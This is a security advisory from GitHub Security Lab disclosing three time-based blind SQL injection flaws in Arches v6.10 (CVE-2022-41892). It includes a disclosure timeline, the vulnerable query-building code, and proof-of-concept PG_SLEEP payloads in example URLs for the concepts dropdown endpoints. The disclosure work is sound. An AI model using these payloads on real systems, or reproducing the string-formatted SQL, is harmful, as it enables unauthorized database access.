GHSL-2022-070_GHSL-2022-072: SQL injection in Arches - CVE-2022-41892

Coordinated Disclosure Timeline

2022-09-08: Sent email to contact@archesproject.org
2022-09-08: Received an automatic reply
2022-10-10: Sent an email with request for an update
2022-10-28: Received a reply about a fix. Asked the maintainer to create an advisory
2022-11-10: The fix is published

Summary

The Arches project contains multiple blind SQL injection vulnerabilities, that allow an attacker to query the underlying database.

Product

Arches

Tested Version

v6.10

Details

All issues identified in this report are blind SQL injections found by using CodeQL SQL injection query available here. For more information see the CodeQL documentation about SQL injection query. By supplying a specially crafted payload to the given below parameters and endpoints, an attacker can inject arbitrary SQL queries to be executed. Since these are blind SQL injections, an attacker may need to use time-based payloads which would include a function to delay execution for a given number of seconds. The response time indicates, whether the result of the query execution was true or false. Depending on the result, the HTTP response will be returned after a given number of seconds, indicating TRUE, or immediately, indicating FALSE. In that way, an attacker can infer if the query execution returned true or false, execute queries, and gain information about the data in the database.

For more information about testing applications for SQL injection see OWASP Web Security Testing Guide - Testing for SQL injection

Issue 1: Time-based blind SQL injection in `paged_dropdown` (`GHSL-2022-070`)

The paged_dropdown endpoint creates a SQL query using the user-controlled query parameter value:

sql = """
    SELECT value, valueid
    FROM
    (
        SELECT *, CASE WHEN LOWER(languageid) = '{languageid}' THEN 10
        WHEN LOWER(languageid) like '{short_languageid}%' THEN 5
        ELSE 0
        END score
        FROM values
    ) as vals
    WHERE LOWER(value)='{query}' AND score > 0
    AND valuetype in ('prefLabel')
    ORDER BY score desc limit 1
"""

languageid = get_language().lower()
sql = sql.format(query=query.lower(), languageid=languageid, short_languageid=languageid.split("-")[0])
cursor = connection.cursor()
cursor.execute(sql)

PoC

Access the concepts/paged_dropdown endpoint and supply the conceptid parameter with a valid UUID (eg: 07864703-481b-42c5-91a8-803cc63f59d0) and the query parameter with the payload ' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo.

Using example.com as an example domain, the payload would look like below:

example.com/concepts/paged_dropdown?conceptid=07864703-481b-42c5-91a8-803cc63f59d0&query=' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo

Resources

Link to the vulnerable code https://github.com/archesproject/arches/blob/a7aace1f5036e0f60980b5fa3983b65b0d9ed715/arches/app/views/concept.py#L407-L425

Issue 2: Time-based blind SQL injection in `get_child_edges` (`GHSL-2022-071`)

The /concepts/paged_dropdown endpoint creates a SQL query using the user-controlled query parameter value:

  if order_hierarchically:
      sql = """
          WITH RECURSIVE
           ordered_relationships AS (
                  #[code skipped for readability]
                  FROM relations r
                  WHERE r.conceptidfrom = '{conceptid}'
                  and ({relationtypes})
                  ORDER BY sortorder, valuesto
              )
          #[code skipped for readability]
          children AS (
              SELECT r.conceptidfrom, r.conceptidto,
                  to_char(row_number() OVER (), 'fm000000') as row,
                  r.collector,
                  1 AS depth       ---|NonRecursive Part
                  FROM ordered_relationships r
                  WHERE r.conceptidfrom = '{conceptid}'
                  and ({relationtypes})
              UNION
                  SELECT r.conceptidfrom, r.conceptidto,
                  row || '-' || to_char(row_number() OVER (), 'fm000000'),
                  r.collector,
                  depth+1      ---|RecursivePart
                  FROM ordered_relationships r
                  JOIN children b ON(b.conceptidto = r.conceptidfrom)
                  WHERE ({relationtypes})
                  {depth_limit}
          )
          {subquery}
          #[code skipped for readability]
      """

      subquery = (
          """, results as (
          SELECT c.conceptidfrom, c.conceptidto, c.row, c.depth, c.collector
          FROM children c
          JOIN values ON(values.conceptid = c.conceptidto)
          WHERE LOWER(values.value) like '%%%s%%'
          AND values.valuetype in ('prefLabel')
              UNION
          SELECT c.conceptidfrom, c.conceptidto, c.row, c.depth, c.collector
          FROM children c
          JOIN results r on (r.conceptidfrom=c.conceptidto)
      )"""
          % query.lower()
          if query is not None
          else ""
      )

      recursive_table = "results" if query else "children"

      sql = sql.format(
          conceptid=conceptid,
          relationtypes=relationtypes,
          child_valuetypes=child_valuetypes,
          parent_valuetype=parent_valuetype,
          depth_limit=depth_limit,
          limit_clause=limit_clause,
          subquery=subquery,
          recursive_table=recursive_table,
          languageid=languageid,
          short_languageid=languageid.split("-")[0],
          default_languageid=settings.LANGUAGE_CODE,
      )

  else:
      sql = """
          WITH RECURSIVE
              children AS (
                  SELECT r.conceptidfrom, r.conceptidto, r.relationtype, 1 AS depth
                      FROM relations r
                      WHERE r.conceptidfrom = '{conceptid}'
                      AND ({relationtypes})
                  UNION
                      SELECT r.conceptidfrom, r.conceptidto, r.relationtype, depth+1
                      FROM relations r
                      JOIN children c ON(c.conceptidto = r.conceptidfrom)
                      WHERE ({relationtypes})
                      {depth_limit}
              ),
              results AS (
             #[code skipped for readability]
              )
              SELECT distinct {columns}
              FROM results {limit_clause}
      """

      if not columns:
          columns = """
              conceptidfrom::text, conceptidto::text,
              valuefrom, valueto,
              valueidfrom::text, valueidto::text,
              valuetypefrom, valuetypeto,
              languagefrom, languageto,
              categoryfrom, categoryto
          """

      sql = sql.format(
          conceptid=conceptid,
          relationtypes=relationtypes,
          child_valuetypes=child_valuetypes,
          columns=columns,
          depth_limit=depth_limit,
          limit_clause=limit_clause,
      )

  cursor = connection.cursor()
  cursor.execute(sql)
  rows = cursor.fetchall()
  return rows

The conceptid parameter is also passed to the query, on which there is performed UUID input validation on line 503-506. Due to the validation, the parameter is not vulnerable to SQL injection, but it would still be good practice to change all the below cases to use prepared statements, as described in the remediation section of this report.

PoC

Access the concepts/paged_dropdown endpoint and supply the query parameter with payload 'and 1=(select 1 from pg_sleep(10)) and 'a%'='a and the conceptid parameter with a valid UUID, f.ex. 07864703-481b-42c5-91a8-803cc63f59d0.

Using example.com as an example domain, the payload would look like below:

example.com/concepts/paged_dropdown?conceptid=07864703-481b-42c5-91a8-803cc63f59d0&query='and 1=(select 1 from pg_sleep(10)) and 'a%'='a

Resources

Link to the vulnerable code https://github.com/archesproject/arches/blob/a7aace1f5036e0f60980b5fa3983b65b0d9ed715/arches/app/models/concept.py#L483-L725

Issue 3: Time-based blind SQL injection in `get_e55_domain` (`GHSL-2022-072`)

The /concepts/dropdown endpoint creates a SQL query using the user-controlled conceptid parameter value:

        sql = """
        WITH RECURSIVE children AS (
            SELECT d.conceptidfrom, d.conceptidto, c2.value, c2.valueid as valueid, c.value as valueto, c.valueid as valueidto, c.valuetype as vtype, 1 AS depth, array[d.conceptidto] AS conceptpath, array[c.valueid] AS idpath        ---|NonRecursive Part
                FROM relations d
                JOIN values c ON(c.conceptid = d.conceptidto)
                JOIN values c2 ON(c2.conceptid = d.conceptidfrom)
                WHERE d.conceptidfrom = '{0}'
                and c2.valuetype = 'prefLabel'
                and c.valuetype in ('prefLabel', 'sortorder', 'collector')
                and (d.relationtype = 'member' or d.relationtype = 'hasTopConcept')
                UNION
                SELECT d.conceptidfrom, d.conceptidto, v2.value, v2.valueid as valueid, v.value as valueto, v.valueid as valueidto, v.valuetype as vtype, depth+1, (conceptpath || d.conceptidto), (idpath || v.valueid)   ---|RecursivePart
                FROM relations  d
                JOIN children b ON(b.conceptidto = d.conceptidfrom)
                JOIN values v ON(v.conceptid = d.conceptidto)
                JOIN values v2 ON(v2.conceptid = d.conceptidfrom)
                WHERE  v2.valuetype = 'prefLabel'
                and v.valuetype in ('prefLabel','sortorder', 'collector')
                and (d.relationtype = 'member' or d.relationtype = 'hasTopConcept')
            ) SELECT conceptidfrom::text, conceptidto::text, value, valueid::text, valueto, valueidto::text, depth, idpath::text, conceptpath::text, vtype FROM children ORDER BY depth, conceptpath;
        """.format(
            conceptid
        )
#[code skipped for readability]
        cursor.execute(sql)

PoC

To test the vulnerability, access the concepts/dropdown endpoint and supply the conceptid parameter with a valid UUID, f.ex. 07864703-481b-42c5-91a8-803cc63f59d0 and then the payload ' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo.

Using example.com as an example domain, the payload would look like below:

example.com/concepts/dropdown?conceptid=07864703-481b-42c5-91a8-803cc63f59d0' AND 1=(SELECT 1 FROM PG_SLEEP(10)) AND 'foo'='foo

Resources

Link to the vulnerable code https://github.com/archesproject/arches/blob/a7aace1f5036e0f60980b5fa3983b65b0d9ed715/arches/app/models/concept.py#L1172-L1217

Impact

This issues may lead to Information Disclosure and possibility to execute SELECT queries on the database.

CVE

CVE-2022-41892

Credit

These issues were discovered and reported by GHSL team member @sylwia-budzynska.

Contact

You can contact the GHSL team at securitylab@github.com, please include a reference to GHSL-2022-070, GHSL-2022-071, or GHSL-2022-072 in any communication regarding these issues.

Coordinated Disclosure Timeline

Summary

Product

Tested Version

Details

Issue 1: Time-based blind SQL injection in paged_dropdown (GHSL-2022-070)

PoC

Resources

Issue 2: Time-based blind SQL injection in get_child_edges (GHSL-2022-071)

PoC

Resources

Issue 3: Time-based blind SQL injection in get_e55_domain (GHSL-2022-072)

PoC

Resources

Impact

CVE

Credit

Contact

Issue 1: Time-based blind SQL injection in `paged_dropdown` (`GHSL-2022-070`)

Issue 2: Time-based blind SQL injection in `get_child_edges` (`GHSL-2022-071`)

Issue 3: Time-based blind SQL injection in `get_e55_domain` (`GHSL-2022-072`)